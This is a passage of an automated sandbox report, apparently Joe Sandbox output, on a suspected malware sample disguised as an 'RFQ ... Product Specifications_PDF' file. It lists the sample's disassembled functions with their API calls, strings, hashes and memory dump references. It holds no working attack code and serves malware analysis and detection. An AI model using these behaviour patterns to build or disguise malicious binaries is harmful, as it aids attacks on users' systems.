                                                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AD3BAC
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AD3BC7
                                                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AD3BE2
                                                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AD3BF6
                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AD3C13
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: 07a1ae7938cfdfda570341c9308fdd95370032687e319ded716a3f7edaec9cf7
                                                                                                                • Instruction ID: 715c86a78dff33a5c94cef0c5d59bc5324a68a8e0a3c867da859389694864173
                                                                                                                • Opcode Fuzzy Hash: 07a1ae7938cfdfda570341c9308fdd95370032687e319ded716a3f7edaec9cf7
                                                                                                                • Instruction Fuzzy Hash: 7F616C75900208AFDB10DFA8CD81EEE77B8EB09710F10459AFA16E73A1D774AE46DB50
                                                                                                                Function 00A72C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A72C94
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A72CA0
                                                                                                                • _free.LIBCMT ref: 00A72CAB
                                                                                                                • _free.LIBCMT ref: 00A72CB6
                                                                                                                • _free.LIBCMT ref: 00A72CC1
                                                                                                                • _free.LIBCMT ref: 00A72CCC
                                                                                                                • _free.LIBCMT ref: 00A72CD7
                                                                                                                • _free.LIBCMT ref: 00A72CE2
                                                                                                                • _free.LIBCMT ref: 00A72CED
                                                                                                                • _free.LIBCMT ref: 00A72CFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: e089698d2a2b3c82ffab1c6702fcb1879f67d7d1d34c59c7a38c96b477856d43
                                                                                                                • Instruction ID: b6c0818846e2102314d3ba6351d83e02f3cd3ac2e007ec7f26a6202d284749e7
                                                                                                                • Opcode Fuzzy Hash: e089698d2a2b3c82ffab1c6702fcb1879f67d7d1d34c59c7a38c96b477856d43
                                                                                                                • Instruction Fuzzy Hash: 82119676100108AFCB02EF64DE42EDD7BA5FF45350F45C4A5FA4C5B222D631EE909B90
                                                                                                                Function 00A41410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A41459
                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 00A414F8
                                                                                                                • UnregisterHotKey.USER32(?), ref: 00A416DD
                                                                                                                • DestroyWindow.USER32(?), ref: 00A824B9
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00A8251E
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A8254B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: 99369bd4e1c652d8c9e8c5adac8c6370fd8dfe45535962d7df663873b4dd586b
                                                                                                                • Instruction ID: b21ec80b9829630dcc374f9cecc26e328c1c45993c3ca598a5b1d58e34d80340
                                                                                                                • Opcode Fuzzy Hash: 99369bd4e1c652d8c9e8c5adac8c6370fd8dfe45535962d7df663873b4dd586b
                                                                                                                • Instruction Fuzzy Hash: 0DD19C35702212CFCB29EF14C999B69F7A4BF85710F1442ADE84A6B252DB30ED52CF91
                                                                                                                Function 00AB7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB7FAD
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB7FC1
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00AB7FEB
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AB8005
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8017
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8060
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AB80B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 769691225-438819550
                                                                                                                • Opcode ID: 6d94e2cdd52971cbb73720c18b01769efb0127b86634b18a0fbac76a36fab194
                                                                                                                • Instruction ID: eebf7f2669d053f48c4fe082c7239ba5ac858bfdb154fdb6400f33d481bb198d
                                                                                                                • Opcode Fuzzy Hash: 6d94e2cdd52971cbb73720c18b01769efb0127b86634b18a0fbac76a36fab194
                                                                                                                • Instruction Fuzzy Hash: CA818D725082419BCB20EF14C944AEEB3ECBFC8350F54485AF885DB252EBB5DD49CB52
                                                                                                                Function 00A45BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00A45C7A
                                                                                                                  • Part of subcall function 00A45D0A: GetClientRect.USER32(?,?), ref: 00A45D30
                                                                                                                  • Part of subcall function 00A45D0A: GetWindowRect.USER32(?,?), ref: 00A45D71
                                                                                                                  • Part of subcall function 00A45D0A: ScreenToClient.USER32(?,?), ref: 00A45D99
                                                                                                                • GetDC.USER32 ref: 00A846F5
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A84708
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A84716
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A8472B
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A84733
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A847C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: c427409dbe434efd4a3400b1564b39440a39abb861618bf781ff6589e845f634
                                                                                                                • Instruction ID: 92a14deaf4ddd44663784bba92e99bdd48928b4a7a23e9b2e9d77ff3c7f01a2d
                                                                                                                • Opcode Fuzzy Hash: c427409dbe434efd4a3400b1564b39440a39abb861618bf781ff6589e845f634
                                                                                                                • Instruction Fuzzy Hash: B271F134800206DFCF21EF64C984AFA7BB5FF8A360F14426AED565A2A6D7318C41DF50
                                                                                                                Function 00AB359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00AB35E4
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • LoadStringW.USER32(00B12390,?,00000FFF,?), ref: 00AB360A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString$_wcslen
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 4099089115-2391861430
                                                                                                                • Opcode ID: 2140b37e008e72367cfde933bf0e41e81a479274f05b56c020befbef2b6f53b2
                                                                                                                • Instruction ID: 3f054136639698523284b30719e7aec47453849460f65d5e0d9f5e81b1699287
                                                                                                                • Opcode Fuzzy Hash: 2140b37e008e72367cfde933bf0e41e81a479274f05b56c020befbef2b6f53b2
                                                                                                                • Instruction Fuzzy Hash: 00518F72800209BADF14EFA0DE42EEEBB78AF45300F544165F505761A2EB302B99DFA1
                                                                                                                Function 00AD8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                  • Part of subcall function 00A5912D: GetCursorPos.USER32(?), ref: 00A59141
                                                                                                                  • Part of subcall function 00A5912D: ScreenToClient.USER32(00000000,?), ref: 00A5915E
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000001), ref: 00A59183
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000002), ref: 00A5919D
                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00AD8B6B
                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00AD8B71
                                                                                                                • ReleaseCapture.USER32 ref: 00AD8B77
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00AD8C12
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AD8C25
                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00AD8CFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                • API String ID: 1924731296-2107944366
                                                                                                                • Opcode ID: 8b033d1923ee0d4a69ebaa6e8edc808610415188eabd5d85ce9fbf2389b96afa
                                                                                                                • Instruction ID: eceea0b21b439f508dc3876c59e7dc6930f4624da4ef3c3a9c1209c0681bce6d
                                                                                                                • Opcode Fuzzy Hash: 8b033d1923ee0d4a69ebaa6e8edc808610415188eabd5d85ce9fbf2389b96afa
                                                                                                                • Instruction Fuzzy Hash: 9A518B75105300AFD700DF24DD96FAA77E4FB88750F400A2EF956972E2DB74A905CB62
                                                                                                                Function 00ABC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ABC272
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ABC29A
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ABC2CA
                                                                                                                • GetLastError.KERNEL32 ref: 00ABC322
                                                                                                                • SetEvent.KERNEL32(?), ref: 00ABC336
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00ABC341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                • Opcode ID: 55c262c32eda7f5a8e2602cfbc5f424c380b817d45a39931c8c863dd07c5e619
                                                                                                                • Instruction ID: 86a24af7832c9dae7f705472a8d42389f2800e2c68660a1569c4c06a0ca32714
                                                                                                                • Opcode Fuzzy Hash: 55c262c32eda7f5a8e2602cfbc5f424c380b817d45a39931c8c863dd07c5e619
                                                                                                                • Instruction Fuzzy Hash: 04316DB1601208AFD721DFA48988EEBBBFCEB49764B54851EF486D7202DB34DD059B60
                                                                                                                Function 00AA989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A83AAF,?,?,Bad directive syntax error,00ADCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AA98BC
                                                                                                                • LoadStringW.USER32(00000000,?,00A83AAF,?), ref: 00AA98C3
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AA9987
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                • API String ID: 858772685-4153970271
                                                                                                                • Opcode ID: 3c1ddef02ffdf202dcc9451bf9c381eb2d4b8036c8abeb37c09dd74f1084c157
                                                                                                                • Instruction ID: 8526f0e396e842fb3af40d6940c408698a50cdd6faa6605512ebfb64f0940244
                                                                                                                • Opcode Fuzzy Hash: 3c1ddef02ffdf202dcc9451bf9c381eb2d4b8036c8abeb37c09dd74f1084c157
                                                                                                                • Instruction Fuzzy Hash: 14217C3280021AFBDF15EF90CD0AEEF7779BF18300F04446AF515660A2EB31AA28DB51
                                                                                                                Function 00AA209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 00AA20AB
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00AA20C0
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AA214D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                • Opcode ID: cb6d5dbfa40bf24422b283f01805b7e364156d040f1c52882c36dcb83922fc3e
                                                                                                                • Instruction ID: 12811d8bfd9b111c7d830127a914c41b1743792028880910865fb6bd04dd3305
                                                                                                                • Opcode Fuzzy Hash: cb6d5dbfa40bf24422b283f01805b7e364156d040f1c52882c36dcb83922fc3e
                                                                                                                • Instruction Fuzzy Hash: 18113A76684307B9FA116724DC06EE73BECCF16324F20025AF704A60E1EF61AC125B14
                                                                                                                Function 00A78D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 49690893ac60b365e0991309ed42242a1aee9c98faa970fa69ecc0b6ad480625
                                                                                                                • Instruction ID: fd157725c6fea775658cca1eb899b85f7ba5147633d70a4c7f1d02c872d2847d
                                                                                                                • Opcode Fuzzy Hash: 49690893ac60b365e0991309ed42242a1aee9c98faa970fa69ecc0b6ad480625
                                                                                                                • Instruction Fuzzy Hash: 66C1E375904249AFDF11DFA8DC45BEEBBB0AF1A310F04C05AE519A7392CB749942CB61
                                                                                                                Function 00A7CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1282221369-0
                                                                                                                • Opcode ID: 324b053f4f4d550bae48753de3b951fd9a756479c4b5d699fffe06ae6182e0bc
                                                                                                                • Instruction ID: 6af568dacabe58fe775edd86313d66e80007a2f84453cc5d9649b8338339f92e
                                                                                                                • Opcode Fuzzy Hash: 324b053f4f4d550bae48753de3b951fd9a756479c4b5d699fffe06ae6182e0bc
                                                                                                                • Instruction Fuzzy Hash: 72612A72904301AFDB25AFB8AD81BAD7BA5EF05330F54C16EF94DA7281EB319D418750
                                                                                                                Function 00AD50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AD5186
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00AD51C7
                                                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 00AD51CD
                                                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AD51D1
                                                                                                                  • Part of subcall function 00AD6FBA: DeleteObject.GDI32(00000000), ref: 00AD6FE6
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD520D
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AD521A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AD524D
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AD5287
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AD5296
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
